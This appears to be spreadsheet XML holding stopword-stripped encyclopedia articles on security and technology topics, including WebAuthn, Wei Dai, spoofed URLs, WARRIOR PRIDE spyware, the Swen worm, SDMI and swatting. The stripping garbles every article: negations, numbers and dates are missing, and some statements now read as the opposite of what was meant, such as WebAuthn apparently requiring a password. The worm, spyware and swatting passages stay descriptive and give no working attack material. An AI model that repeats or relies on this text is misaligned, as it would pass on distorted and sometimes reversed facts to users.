    <t>authentication (webauthn) standard published world wide consortium (w3c). webauthn core component fido2 project guidance fido alliance. goal project standardize interface authenticating users web-based applications services using public-key cryptography. client side, support webauthn implemented variety ways. underlying cryptographic operations performed authenticator, abstract functional model mostly agnostic respect material managed. this makes possible implement support webauthn purely software, making processor's trusted execution environment trusted platform module (tpm). sensitive cryptographic operations also offloaded roaming hardware authenticator turn accessed usb, bluetooth energy, near-field communications (nfc). roaming hardware authenticator conforms fido client authenticator protocol (ctap), making webauthn effectively backward compatible fido universal factor (u2f) standard.similar legacy u2f, authentication resilient verifier impersonation, resistant active man-in-the-middle-attacks, unlike u2f, webauthn require traditional password. moreover, roaming hardware authenticator resistant malware since private material time accessible software running host machine. webauthn level standard published recommendation march 2019. level specification development. level specification currently first public working draft (fpwd). background fido2 successor fido universal factor (u2f) legacy protocol. fido2 authentication advantages u2f—the primary difference fido2 authenticator also single-factor (passwordless) authenticator. protocol designed second factor strengthen existing username/password-based login flows. fido2 authenticator used either single-factor mode multi-factor mode. single-factor mode, authenticator activated test user presence, usually consists simple button push. multi-factor mode, authenticator (something have) performs user verification. depending authenticator capabilities, something know: secret pin, passcode swipe pattern something are: biometric fingerprint, iris voicein case, authenticator performs user verification locally device. secret biometric stored authenticator shared website. moreover, single secret biometric works websites, authenticator select correct cryptographic material service requesting authentication user verification completed successfully. secret biometric authenticator used together, similarly would used smartphone. example, fingerprint used provide convenient access smartphone occasionally fingerprint access fails, case used. overview like predecessor fido u2f, authentication (webauthn) involves website, browser, authenticator: website conforming webauthn relying party browser conforming webauthn client authenticator fido2 authenticator, assumed compatible webauthn clientwebauthn specifies claimant demonstrates possession control fido2 authenticator verifier called webauthn relying party. authentication process mediated entity called webauthn client, little conforming browser. authentication purposes illustration, assume authenticator roaming hardware authenticator (see options). case, authenticator multi-factor cryptographic authenticator uses public-key cryptography sign authentication assertion targeted webauthn relying party. assuming authenticator uses user verification, authenticator something something know. initiate webauthn authentication flow, webauthn relying party indicates intentions webauthn client (i.e., browser) javascript. webauthn client communicates authenticator using javascript implemented browser. roaming authenticator conforms fido client authenticator protocol. webauthn strictly require roaming hardware authenticator. alternatively, software authenticator (implemented smartphone, e.g.) platform authenticator (i.e., authenticator implemented directly webauthn client device) used. relevant examples platform authenticators include windows hello android operating system.the illustrated flow relies pin-based user verification, which, terms usability, modest improvement ordinary password authentication. practice, biometrics user verification improve usability webauthn. logistics behind biometrics still poorly understood, however. there lingering misunderstanding among users biometric data transmitted network manner passwords, case. registration when webauthn relying party receives signed authentication assertion browser, digital signature assertion verified using trusted public user. webauthn relying party obtain trusted public first place? obtain public user, webauthn relying party initiates webauthn registration flow similar authentication flow illustrated above. primary difference authenticator signs attestation statement attestation private key. signed attestation statement contains copy public webauthn relying party ultimately uses verify signed authentication assertion. attestation statement also contains metadata describing authenticator itself. digital signature attestation statement verified trusted attestation public particular model authenticator. webauthn relying party obtains store trusted attestation public keys unspecified. option fido metadata service.the attestation type specified javascript determines trust model. instance, attestation type called self-attestation desired, trust model essentially trust first use. support webauthn level standard published recommendation authentication working group march 2019. webauthn supported google chrome, mozilla firefox, microsoft edge, apple safari opera.the desktop version google chrome supported webauthn since version firefox, fully supported previous fido standard, included enabled webauthn firefox version released 2018. early windows insider release microsoft edge (build 17682) implemented version webauthn works windows hello well external security keys.existing fido security keys largely compatible webauthn standard, though webauthn added ability reference unique per-account "user handle" identifier, older authenticators unable store. first fido2-compatible authenticators second-generation security yubico, announced april 2018.the first security level certified fido2 key, called "goldengate" announced year later ewbm april 2019. anddropbox announced support webauthn logins factor) 2018.apple announced face touch could used webauthn platform authenticator safari june 2020. webauthn implements extension w3c's general credential management api, attempt formalize interaction websites browsers exchanging user credentials. authentication extends credential management navigator.credentials.create() navigator.credentials.get() javascript methods accept publickey parameter. create() method used registering public authenticators part associating user accounts (possibly initial account creation time likely adding security device existing account) get() method used authenticating (such logging in). check browser supports webauthn, scripts check window.publickeycredential interface defined. addition publickeycredential, standard also defines authenticatorresponse, authenticatorattestationresponse, authenticatorassertionresponse interfaces addition variety dictionaries datatypes. allow direct access manipulation private keys, beyond requesting initial creation. reception august 2018, paragon initiative enterprises conducted security audit webauthn standard. while could find specific exploits, revealed serious weaknesses underlying cryptography used mandated standard.the main points criticism revolve around potential issues problematic cryptographic systems past therefore avoided order fall victim class attacks: through mandated cose (rfc 8152) webauthn also supports pkcs1v1.5 padding. this particular scheme padding known vulnerable specific attacks least twenty years successfully attacked protocols implementations cryptosystem past. difficult exploit given conditions context webauthn, given secure cryptographic primitives padding schemes, still choice considered best practice among cryptographers more. fido alliance standardized asymmetric cryptographic scheme ecdaa. this version direct anonymous attestation based elliptic curves case webauthn meant used verify integrity authenticators, also preserving privacy users, allow global correlation handles. however, ecdaa incorporate lessons learned last decades research area elliptic curve cryptography, chosen curve security deficits inherent type curve, reduces security guarantees quite substantially. furthermore, ecdaa standard involves random, non-deterministic, signatures, already problem past.paragon initiative enterprises also criticized standard initially developed, proposal made public advance experienced cryptographers asked suggestions feedback. hence standard subject broad cryptographic research academic world. despite shortcomings, paragon initiative enterprises still encourage users continue webauthn come recommendations potential implementors developers standard hope implemented standard finalized. avoiding mistakes early possible would prevent industry challenges introduced broken standards need backwards compatibility. ecdaa designed used combination device attestation. this particular feature webauthn necessarily required authentication work. current implementations allow user decide whether attestation statement sent registration ceremony. independently, relying parties choose require attestation not. ecdaa removed webauthn level implemented browsers relying parties. references external links authentication: accessing public credentials level authentication working group authentication webauthn awesome</t>
  </si>
  <si>
    <t>Wei Dai</t>
  </si>
  <si>
    <t>(chinese: computer engineer known contributions cryptography cryptocurrencies. developed crypto++ cryptographic library, created b-money cryptocurrency system, co-proposed vmac message authentication algorithm. smallest subunit ether, wei, named him. education career graduated university washington degree computer science described "intensely private computer engineer". member cypherpunks, extropians, mailing lists 1990s. exchanged people eliezer yudkowsky, robin hanson, nick bostrom, eric drexler, finney, others nascent "rationalist" community. cryptography made several contributions field cryptography identified critical cipher block chaining (cbc) vulnerabilities affecting ssh2 browser exploit ssl/tls known beast (browser exploit against ssl/tls). crypto++ june 2015 stepped away crypto++ project work projects. crypto++ maintained crypto++ community. vmac vmac block cipher-based message authentication code (mac) algorithm using universal hash proposed krovetz april 2007. algorithm designed high performance backed formal analysis. b-money 1998, helped spark interest cryptocurrencies publication "b-money, anonymous, distributed electronic cash system". paper, outlines basic properties modern cryptocurrency systems: "...a scheme group untraceable digital pseudonyms money enforce contracts amongst without outside help". influence development bitcoin described "money impossible regulate", dai's b-money described core concepts later implemented bitcoin cryptocurrencies: requires specified amount computational work (aka proof work). work done verified community update collective ledger book. worker awarded funds effort. exchange funds accomplished collective bookkeeping authenticated cryptographic hashes. contracts enforced broadcast signing transactions digital signatures (i.e., public cryptography). relationship satoshi nakamoto adam back first people contacted satoshi nakamoto developing bitcoin 2008 b-money paper referenced subsequent bitcoin whitepaper. 2011 article, noted cryptographer nick szabo stated:myself, dai, finney people know liked idea dai's case related idea) enough pursue significant extent nakamoto (assuming nakamoto really finney dai).however, questions b-money's influence bitcoin:...my understanding creator bitcoin, goes name satoshi nakamoto, even read article reinventing idea himself. learned afterward credited paper. connection project quite limited. there much speculation identity satoshi nakamoto, suspects including himself, nick szabo, finney, denied putative identification. references edit, article uses content "wei bitcoin wiki", licensed permits reuse creative commons attribution-sharealike unported license, gfdl. relevant terms must followed. this article incorporates text taras jonathancross available by-sa license. external links official website lesswrong profile effective altruism forum profile sourceforge profile google scholar profile</t>
  </si>
  <si>
    <t>Spoofed URL</t>
  </si>
  <si>
    <t>spoofed describes website poses another website. sometimes applies mechanism exploits bugs browser technology, allowing malicious computer attack. such attacks effective computers lack recent security patches. others designed purpose parody. during attack, computer user innocently visits website sees familiar address http://www.wikipedia.org reality, sending information entirely different location would typically monitored information thief. when sensitive information requested fraudulent website, called phishing. user typically enticed false website email hyperlink another website. another variation, website look like original, fact parody these mostly harmless, noticeably different original, usually exploit bugs browser technology. redirects also take place hosts file, redirecting legitimate site(s) another spoofed url. cyber security spoofing deception hoaxing. urls address resource document website) internet consists communications protocol followed name address computer network often includes additional locating information directory file names). simply, spoofed address illuminates immense amount deception ability appear original site, despite one. order prevent falling victim prevalent scams stemmed spoofed urls, major software companies come forward advised techniques detect prevent spoofed urls. detection order prevent criminals accessing personal information, credit card information, bank account/routing numbers, one’s telephone number, home address, etc. important learn understand spoof urls detected. important first verify name site digital certification ssl/tls. always identify actual page make sure able full hyperlink, examine address. some characters commonly found spoofed urls are: %00, %01, sometimes urls differ single letter number. addition, internet security level high ensure computer protected possible attacks spoofed sites. general, input personal information website name verified digital certificate. also, concern confidentiality website leave page immediately. prevention spoofed urls, universal defining identity phishing scams, pose serious threat end-users commercial institutions. email continues favorite vehicle perpetrate scams mainly widespread combined ability easily spoof them. several approaches, generic specialized, proposed address problem. however, phishing techniques, growing ingenuity well sophistication, render solutions weak. order prevent users future victimization stemmed spoofed url, internet vigilantes published numerous tips help users identify spoof. common are: using authentication based exchange machines network, using access control list deny private addresses downstream interface, implementing filters inbound outbound traffic, configuring routers switches support configuration, reject packets originating outside local network claim originate within, enable encryption sessions router trusted hosts outside network securely communicate local hosts. ultimately, protection comes individual user. keeping spoofing techniques scams readily allow identify scam importantly keep information secure personal. susceptible targets paypal, e-commerce business allows money transactions made internet common target spoofed urls. this forgery legitimate paypal website allows hackers gain personal financial information thus, steal money fraud. along spoof fake emails appear generic greetings, misspellings, false sense urgency, spoofed urls easy hackers violate one’s paypal privacy. example, www.paypalsecure.com, includes name, spoofed designed deceive. remember always paypal window browser never email. case receive suspected spoofed url, forward entire email spoof@paypal.com help prevent tricking paypal users. common crimes major crime associated spoofed urls identity theft. thief create website similar appearance popular site, user accesses spoofed url, inadvertently give thief credit card personal details. their spoofed urls might “too good true” prices lure looking good deal. crimes like happen quite often, frequently festive holidays heavy online shopping periods year.another crime associated spoofed urls setting fake anti-malware software. example would ransomware, fake anti-malware software locks important files computer run, forces user ransom files back. user refuses certain period time, ransomware delete files computer, essentially making computer unusable. programs usually appear popular websites, dating sites social media sites like facebook twitter. they also come form attachments emails. phishing scams also another major users tricked scams (see below). phishing phishing scam e-mail user duped revealing personal confidential information scammer illicitly. phishing action fraudsters sending email individual, hoping seek private information used identity theft, falsely asserting reputable legal business. phishing performed emails containing spoofed url, links website. since usually appears form email, crucial rely address “from” field order prevent phishing. computer users also look spelling mistakes within website's urls, another common sign look phishing email. website whose urls e-mails requests individuals enter personal information businesses update system. this information often includes passwords, credit card numbers, social security, bank account numbers. turn, email recipients giving fake businesses information real businesses already have. also computer insecurity hosts file homograph attack internet fraud prevention social engineering (computer security) spoofing attack references</t>
  </si>
  <si>
    <t>WARRIOR PRIDE</t>
  </si>
  <si>
    <t>warrior pride gchq code name pair spyware kits installed iphone android-based smartphones. information kits published press january 2014 documents leaked edward snowden. kits iphone developed first; code ported undisclosed code base. android port completed later 2010) done collaboration communications security establishment canada. although using different code, modules names platforms (all seemingly derived smurfs cartoons), correspond functionality follows: dreamy smurf handles power management, according guardian includes ability stealthily activate phone apparently turned off" nosey smurf "hot mic", turning microphone listen conversations tracker smurf high-precision geolocation porus "kernel stealth" paranoid smurf "self-protection"as file retrieval capabilities, iphone claims "any content phone, e.g. sms, mms, e-mails, history, call records, videos, photos, address book, notes, calendar [sic] phone it)." android slide differs slightly last sentence qualified think it".this type software apparently used, among things, discredit muslim targets exposing "online promiscuity" (usage pornography).the cost whole program targeting smartphones cited billion dollars. program includes additional interception capabilities performed intercepting network traffic, including collecting information leaked many apps, metadata (exif) collection smartphone photo uploads social media sites, interception google maps requests geolocate user etc. also catalog document revealing broader older (2008) tools, smartphones regin (malware) sophisticated malware toolkit tailored access operations references</t>
  </si>
  <si>
    <t>WAP billing</t>
  </si>
  <si>
    <t>billing mechanism consumers content wireless application protocol (wap) sites charged directly mobile phone bill. alternative payment mechanism debit credit cards premium billing. using billing, consumers mobile content without registering service entering username password. user clicks link agrees make purchase, download content. billing particularly associated downloading mobile entertainment content like ringtones, mobile games wallpapers. some commentators suggested could compete premium leading payment channel mobile content. billing works billing works wap-enabled mobile phones gprs wireless connection. customer initiates session content service provider browsing page, example. site hoster obtains visitor's msisdn without visitor register specific gateway service. this information provided integration operator's msisdn lookup service. consumers confirm purchase clicking 'confirm purchase' link mobile phone billing platform informs application completed purchase transaction. consumers redirected content purchased. purchases recorded billed directly mobile phone bill using msisdn. cross-operator billing attempts made create single, cross-operator billing platform support purchase products mobile network.in markets, like ireland, billing available across vodafone mobile operators, msidsn forwarding. billing available mobile aggregators operating irish market case case, business model basis, unlike market. benefits billing benefits cited billing include ability sell minors lack credit card bank account improved customer experience including 'single click' purchases transactions completed without consumers send receive text message remember shortcodes. claimed billing also reduces possibility fraud paying mobile content. another benefit cited billing assertion users experience 'browse buy' experience used internet. critique billing billing lacks transparency customer. signing contract, handing money human, reading, understanding writing least typing something thus also indirectly proving legitimate customer reduced single touch. even child occasionally touches screen trigger purchase. often customer notice they've actually paid something bought subscription, look phone bill afterwards. silently start billing single click inviting malicious apps malicious embedded ads. this misuse billing form clickjacking. once triggered hard stop cancel payment. normally three entities involved claim money: your mobile provider, payment gateway provider finally party provider offers paid service.thus, service indirectly paid phone bill. this makes complicated deny payment claim money back. 2013, federal trade commission settled jesta digital concerning unauthorized billing charges. also billing references</t>
  </si>
  <si>
    <t>Swen (computer worm)</t>
  </si>
  <si>
    <t>swen mass mailing computer worm written c++. sends email contains installer virus, disguised microsoft windows update, although also works filesharing networks, newsgroups' websites. first analyzed september 2003, however, might infected computers then. disables firewalls antivirus programs. infection self-installation virus first sends email attachment, posing update windows. attachment .com, .scr, .bat, .pif, .exe file extension. file name starts letters displays fake microsoft update dialogue box, asking user wants install microsoft security update choices "yes" "no". user presses "yes", displays fake progress installing fake update. when finished, displays another dialogue saying: microsoft internet update pack this successfully installed. malware re-executes itself, followed another dialogue saying: microsoft security update pack this update need installed system. user chooses "no", malware still install silently background. next, checks certain criteria opening another dialogue box, prompting user email address, username, password, smtp pop3 server addresses. after completing said fields, worm makes copy c:\windows folder &lt;random characters&gt;.exe. virus finally moves information copy terminates. autostart worm creates following registry entry execute upon startup: {{{1}}} references trend micro threat encyclopedia worm_swen.a bitdefender virus information swen.a@mm</t>
  </si>
  <si>
    <t>Trymedia</t>
  </si>
  <si>
    <t>trymedia systems, inc. division realnetworks provides digital distribution services based proprietary activemark digital distribution technology. trymedia headquartered francisco, offices berkshire alicante. overview trymedia founded 1999 trymedia systems, inc. cousins alex torrubia andres torrubia. company launched spain, round fund-raising york, relocated francisco. macrovision acquired trymedia us$34 million july 2005. with acquisition, macrovision launched games division, trymedia games division, based around trymedia employees. trymedia profitable operation, losing $14.5 million revenue million 2007. february 2008, realnetworks announced acquired trymedia macrovision undisclosed sum, reported macrovision conference call $4million.trymedia operates online network digitally distributed computer games. network integrated microsoft's digital locker service, provides white label online retail services affiliates electronics boutique gamespot. activemark activemark technology suite trymedia secure digital distribution. provides protection software distributed digitally cds/dvd, along commerce, distribution, administration marketing services. trygames trygames, division trymedia, retail website offering computer games trymedia games network download, trial purchase. launched 2001. also tivo corporation references</t>
  </si>
  <si>
    <t>Secure Digital Music Initiative</t>
  </si>
  <si>
    <t>secure digital music initiative (sdmi) forum formed late 1998, composed consumer electronics, security technology, recording industry companies, well authors, composers publishing rightsholders (represented cisac biem representatives, mainly sgae/sdae (gonzalo mora velarde josé manuel macarro), gema (alexander wolf thomas kummer-hardt), sacem/sdrm (aline jelen, catherine champarnaud, laurent lemasson), mcps/prs (mark isherwood), ascap (edward oshanani), sodrac), ostensibly purpose developing technology rights management systems specifications protect developed installed, playing, storing, distributing performing digital music. specifically, goals sdmi provide consumers convenient access music online digital distribution systems, apply digital rights management restrictions work artists, promote development music-related business technologies. sdmi direct response widespread success file format.according site, sdmi existed develop “technology specifications protect playing, storing, distributing digital music market digital music emerge.” would used dataplay, optical disc format time cheaper higher capacity memory cards, cards. method strategy sdmi group involved stages. first implement secure digital watermarking scheme. this would allow music tagged secure watermark hard remove source audio without damaging second ensure sdmi-compliant players would play sdmi tagged music authorized device. reasoning even files distributed could played device would detect music authorized played challenges part strategy included demonstrating watermarking could detected third parties result removed music. part process ratifying technology sdmi announced challenge open letter digital community september 2000. letter invited hackers, cryptologists others detect remove watermark example pieces music. several groups became involved, including group felten. felten's group claimed cracked scheme successfully removed watermark according automated judging software supplied sdmi. sdmi disagreed, noting requirement files lose sound quality automated system take account. when felten attempted publish academic paper describing analysis sdmi scheme (having opted confidentiality requirement would allowed claim prize money) sdmi, riaa verance corporation threatened legal action auspices dmca. controversy stifling academic research resonated scientific cryptography circles paper eventually published 2001 assurances united states department justice dmca would used stifle legitimate research. demise october 1999, eric scheirer, later digital music analyst forrester research, wrote editorial mp3.com titled "the sdmi" declared group's true goal fold technology industry alliance would guarantee record industry's near monopoly musical content failed. drew rebuttal president sdmi, leonardo chiariglione. sdmi inactive since 2001.chiariglione stepped sdmi's director 2001, later explained reason sdmi's halt departure follows: unfortunately turned none technologies submitted could satisfy requirements beginning, e.g. unnoticeable so-called "golden ears". sdmi decided suspend work wait progress technology. also analog hole content protection recordable media cinavia dataplay references external links sdmi homepage wayback machine (archived 2005) open letter digital community sdmi executive director challenges mp3.com editorial november 1999 newswire article reading between lines: lessons sdmi challenge, princeton team paper, sdmi issues</t>
  </si>
  <si>
    <t>Swatting</t>
  </si>
  <si>
    <t>swatting criminal harassment tactic deceiving emergency service (via means hoaxing emergency services dispatcher) sending police emergency service response team another person's address. this triggered false reporting serious enforcement emergency, bomb threat, murder, hostage situation, false report mental health emergency, reporting person allegedly suicidal homicidal armed, among things.the term derived enforcement unit "swat" (special weapons tactics), specialized type police unit united states. these units equipped tactical gear weapons differ patrol units, called situations deemed high risk. threat result evacuations schools businesses. advocates called swatting described terrorism intimidate create risk injury death.making false reports emergency services criminal offense many jurisdictions, often punishable fine imprisonment. march 2019, california sentenced years prison carrying fatal 2017 swatting. swatting carries high risk violence, causes dollars wasted city county responding false report serious enforcement emergency, well liability things wrong.: california, swatters bear "full cost" response lead fines $10,000 great bodily injury death occur result swatting. origins bomb threats concern police 1970s, public buildings airports evacuated response hoax calls designed cause mass panic public disruption, delay exams educational institutions. recent decades, hoax callers sometimes make techniques disguise identity country origin.swatting origins prank calls emergency services. over years, callers used increasingly sophisticated techniques direct response units particular types. particular, attempts swat teams dispatched particular locations spawned term swatting. term used early 2008, also entered oxford dictionaries online 2015. techniques caller spoofing, social engineering, tty, prank calls, phone phreaking techniques variously combined swatting perpetrators. systems (including computer telephony systems human operators) tricked calls placed cities hundreds miles away location purported call, even countries. caller typically places call using spoofed phone number hide fraudulent caller's real location) goal tricking emergency authorities responding swat team fabricated emergency. swatting linked action doxing, obtaining broadcasting, often internet, address details individual intent harass endanger them. measures swatting october 2018, seattle police department took three-pronged approach combating swatting: educating dispatchers identify potential swatting calls, ensuring responding officers aware potential hoax situation, creating opt-in registry people fear might become victims swatting, journalists, celebrities, live streamers. using registry, people provide cautionary information police, inform officers responding potential swatting attempts targeted victim's address.security reporter brian krebs recommends police departments take extra care responding calls received non-emergency numbers, text-to-speech services (tty), since methods often employed out-of-area swatters cannot connect regional center. september 2019, seattle police department formed swatting mitigation advisory committee, group subject matter experts, community police representatives. purpose committee better understand swatting collecting analyzing data, formalizing protocols, advocating broader awareness prevention. committee currently co-chaired naveed jamali sean whitcomb, creator anti-swatting registry. laws united states united states, swatting prosecuted federal criminal statutes: "threatening interstate communications" "conspiracy retaliate witness, victim, informant" "conspiracy commit access device fraud unauthorized access protected computer" accomplice found guilty "conspiring obstruct justice" california, callers bear "full cost" response range $10,000in 2011, california state senator lieu authored bill increase penalties swatting. family became victim swatting bill proposed. dozen police officers, along firefighters paramedics surrounded family home. 2015 jersey state assemblyman paul moriarty announced bill increase sentences hoax emergency calls, targeted hoax. bill proposed prison sentences years fines $150,000. 2015 bipartisan bill congress sponsored katherine clark patrick meehan made swatting federal crime increased penalties. congresswoman clark wrote op-ed hill saying million cases cyber stalking 2010 2013 resulted cases prosecuted, although source provided. revenge bill, anonymous caller fraudulently called police rep. clark's house january 2016. injuries deaths swatting 2015 incident january 2015, sentinel, oklahoma, washita county, dispatchers received calls someone identified dallas horton, told dispatchers placed bomb local preschool. washita county sheriff's deputies sentinel police chief louis ross made forced entry horton's residence. ross, wearing bulletproof vest, shot several times horton. further investigation revealed calls originate home, oklahoma state bureau investigation agents believe horton unaware enforcement officers making entry. james edward holly confessed investigators made calls "nonfunctioning" phones angry horton. ross, shot multiple times chest arm, injured, treated wounds, released local hospital. 2017 incident december 2017, wichita police officer shot civilian named andrew finch kansas home swatting incident. andrew finch later died hospital. based series screenshotted twitter posts, wichita eagle suggests finch unintended victim swatting call duty: wwii players team heated argument $1.50 (usd) bet. december 2017, angeles police department arrested 25-year-old serial swatter tyler barriss, known online "swautistic" xbox live "goredtutor36," connection incident. 2018, barriss indicted federal grand jury along others involved incident. according u.s. attorney stephen mcallister, hoax charge carries maximum punishment life federal prison charges carry sentences years. march 2019, barriss sentenced years' imprisonment. gamer recruited barriss pleaded guilty felony charges conspiracy obstruction justice, sentenced prison months well two-year playing video games. 2020 incident april 2020, mark herring, sixty-year-old bethpage, tennessee, died heart attack police responded false reports woman killed home. swatting organized attempt force give twitter handle "@tennessee". shane sonderman sentenced five years prison swatting, ordered $250,000 fine. minor united kingdom also involved, cannot extradited identified underage. other notable cases 2013, number u.s. celebrities became victims swatting, including sean combs diddy). past, swatting incidents homes ashton kutcher, cruise, chris brown, miley cyrus, iggy azalea, jason derulo, snoop dogg, justin bieber, clint eastwood.in 2013, network fraudsters involved carding doxing public officials using stolen credit reports targeted computer security expert brian krebs malicious police reports. islam, leader group, also used swatting hoaxes prosecutor stephen heymann, congressman mike rogers, girl cyberstalking turned romantic proposals. islam convicted doxing swatting public figures, including michelle obama, robert mueller, john brennan well krebs, sentenced years prison. ukrainian computer hacker sergey vovnenko convicted trafficking stolen credit cards, well planning purchase heroin ship brian krebs swatting him. sentenced months prison italy, months prison jersey.hal finney, paralyzed computer scientist als, swatted 2014 refusing $400,000 extortion fee. finney faced cold, unsafe conditions lawn half hour police clearing home. continued receiving threats death august 2014.due popularity streaming services, many broadcasters became victim swatting. weeks fortnite world finals, 16-year-old kyle "bugha" giersdorf million title best solo fortnite player, swatted streaming live twitch. other broadcasters "drlupo" lupo stated swatted three times month. other popular gaming broadcasters victims swatting including tyler "ninja" blevins. also computer security mobbing references further reading "the crime 'swatting' fake 9-1-1 calls have real consequences". federal bureau investigation. september 2013. wilson, simone (november 2012). "swatting, deadly political game". weekly. sterling, bruce (november 2007). "guilty plea: phone phreaks caller-id spoofing foes raided swat threat level wired.com". wired. omega, (september 2014). "teenager receiving life prison 'swatting' gamer satirical hoax which stirred social media". inquisitr. klepek, patrick (february 2015). "meet teenager says he's swatter". kotaku.</t>
  </si>
  <si>
    <t>TunnelBear</t>
  </si>
  <si>
    <t>tunnelbear public service based toronto, canada. created daniel kaldor ryan dochuk 2011. march 2018, tunnelbear acquired mcafee. history early history tunnelbear founded 2011 ryan dochuk daniel kaldor, headquartered toronto, canada. 2018 mcafee acquisition 2018, tunnelbear acquired cybersecurity company mcafee subsequently fell u.s. jurisdiction. mcafee intended combine service tunnelbear's technologies. time acquisition, tunnelbear continue using brand products. anti-censorship efforts during 2014 venezuelan protests, tunnelbear offered free service users connecting venezuela. response government censorship countries like venezuela—including iran, turkey uganda—tunnelbear offered free unlimited data users within countries. features freeware tunnelbear client available android, windows, macos ios. also browser extensions google chrome opera. alternatively, linux distros configured tunnelbear.like public services, tunnelbear ability bypass content blocking countries.all tunnelbear clients aes-256 encryption exception client earlier, uses aes-128. when connected, user's actual address visible websites visited. instead, websites and/or computers would able spoofed address provided service. tunnelbear among first consumer vpns conduct publicly release results independent security audit. they record users connect service publish annual reports number times enforcement requested user information. reception scott gilbertson wired praised tunnelbear's “cute bear animations”, saying make service approachable, described provider security features comparable competition easy-to-understand privacy policy. provider faced criticism wirecutter comparatively slower speeds dropped video calls tests service, wirecutter stated tunnelbear excels “usability, trust, transparency”. hodge cnet criticised service limited server locations inability users pick individual server within location. hodge also raised concerns tunnelbear's records could subpoenaed canadian business owned american company. also comparison virtual private network services references external links official website</t>
  </si>
  <si>
    <t>ROM Mark</t>
  </si>
  <si>
    <t>computing, mark bd-rom mark serialization technology designed guard mass production piracy mass duplication sale unauthorized copies pre-recorded blu-ray discs. only licensed bd-rom manufacturers access equipment make unique marks, thus allowing authentic bd-rom media like movies music identified.the mark contains volume required decrypt content encrypted using aacs. also burst cutting area notes references panasonic, philips, sony. bd-rom mark specification. edmonds, robert (saratoga, mcdonnell, kevin (pleasanton, meulder, johan (kessel, be). "method apparatus identifying digital recording source". mpaa. "digital content protection status report". irma annual recording media forum. (powerpoint file, internet archive) cdrinfo. "blu-ray disc marking system explained". cdrinfo. "datarius databank reads bd-rom mark".</t>
  </si>
  <si>
    <t>Swappa</t>
  </si>
  <si>
    <t>swappa user-to-user marketplace buying selling gently used technology. buyers sellers connect directly devices must fully functional sold listed swappa. swappa employs customer service team reviews listed devices ensure meet requirement. history swappa founded edwards launched december 2010. swappa headquartered kansas city, missouri, remote workplace employees spread across united states around world including ecuador, greece, india, thailand. swappa marketplace launched goal building safer simpler marketplace. launched serve alternative online marketplaces ebay craigslist. products sold swappa swappa launched 2010 android marketplace started expanding available device categories 2012. first category added 2012 allowed sellers create listings iphones. swappa marketplace allows sellers list following: iphone android smartphones ipad android tablets smartwatches cameras camera lenses home tech video game consoles video games select laptop computers imac mini desktop computers gpus buying swappa swappa users purchase listing swappa seller swappa account using guest account. swappa marketplace allows buyers find items using on-site navigation system using search bar. buyers amount shown listing page, price shown buyers includes standard shipping costs. after buyer makes purchase, given access private sale page communicate directly seller swappa staff. selling swappa swappa sellers required swappa account. swappa users standard swappa account list items sale. swappa also trusted seller program enterprise seller program.listings sellers using standard swappa account sellers part trusted seller program reviewed swappa's moderation team approved sale. listing review process includes reviewing verification photos, checking serial number, making sure device meets required criteria, sellers account history. swappa product condition categories swappa defines conditions new, mint, good, fair. requirements category defined follows: new: unopened retail packaging (factory sealed) mint: pristine condition, signs wear tear good: excellent condition, minor wear, tear fair: noticeable wear tear swappa device criteria requirements swappa requires devices fully functional including functions screen, buttons, ports, camera. listed devices must functional battery properly charges discharges. devices must clean ready activation, cannot outstanding financial obligation carrier, cracked chipped glass, water damage, structural issues. payments fees swappa swappa uses paypal marketplaces process payments. according swappa, paypal used payment processing protections offered buyers sellers.paypal purchase protections buyers include coverage items damaged lost shipping items advertised. paypal's buyer protections also include dispute resolution valid days date purchase. paypal protections sellers include fraud protection offer protection unauthorized transactions item received claims.selling swappa free sellers. buyers sale already included displayed price listing. swappa sale tiered based sellers asking price. swappa services esn/imei/meid checks swappa requires cellular-connected devices fully functional, ready activation, clean imei meid. swappa employs team moderators review listings approved ensure listed devices meet requirements. swappa also provides free check service available public. repair network swappa repair network originally launched 2017. swappa repair network directory 2,000+ repair shops capable providing repair services smartphones, tablets, technology. swappa re-launched repair network 2020 introduced repair calculator assist users determining cost repairing broken phone. protection plans swappa partnered warranty life 2016 provide protection plans used phones purchased swappa marketplace. 2018, swappa warranty life began offering protection plans used macbooks purchased swappa marketplace. warranty life protection plans include year coverage, cover issues broken screens, water damage, power surges. swappa local swappa local introduced june 2019 buyers sellers connect meet locally. swappa local listings function manner traditional swappa listing swappa moderation team reviews every local listing approved. carrier phone plans reviews december 2019, swappa added carrier phone plan pages. phone plan pages outline different wireless plans available three major u.s. wireless carriers; at&amp;t, verizon, t-mobile, wireless plans available mvno carriers. phone plan pages also include section swappa users review rate wireless carriers. growth swappa facilitated $500,000 seller proceeds 2011 reported $1,000,000 seller proceeds 2012. reported seller proceeds years 2013 2017 follows: 2013: $7,000,000 2014: $23,000,000 2015: $43,000,000 2016: $60,000,000 2017: $77,000,000seller proceeds 2018 reported million, total $300 million since swappa founded 2010. recognition 2013, mobile software development community made swappa official marketplace devices.in 2016, wall street journal noted swappa smart trade gadgets cash.in 2018, york times noted swappa good used phone without getting fleeced.in 2018, swappa received sitejabber customer choice award.in 2019, swappa noted reputable places shop online used phones cnn.in 2020, angeles times included swappa part list best places sell used phone online.in 2020, today show included swappa story creating virtual classroom home. references</t>
  </si>
  <si>
    <t>Secure Digital Container</t>
  </si>
  <si>
    <t>secure digital container (sdc) compressed, encrypted executable file type made used e-academy license management system (elms) secure downloads primarily academic software. after downloaded, decrypted software extracted. file created e-academy distribution academic software purchased freely downloaded academic user base. cannot opened without secure delivery client. secure delivery client requests permission elms download. elms denied request, download proceed. there also limited number downloads customer could use. when download count hits zero, customer would unable download copies software. older files weak protection unpacked unpacksdc tool.recently related files introduced. they metadata secure download manager, downloads either normal exe/msi files encrypted files automatically decrypts them. also dreamspark msdnaa references further reading entrepreneur, march 2013, “what need know about digital wallets” electronic frontier foundation ”digital rights management” prweb, 2007, “new digital distribution technology delivers myspace riot”</t>
  </si>
  <si>
    <t>SpectorSoft</t>
  </si>
  <si>
    <t>Svalbard Global Seed Vault</t>
  </si>
  <si>
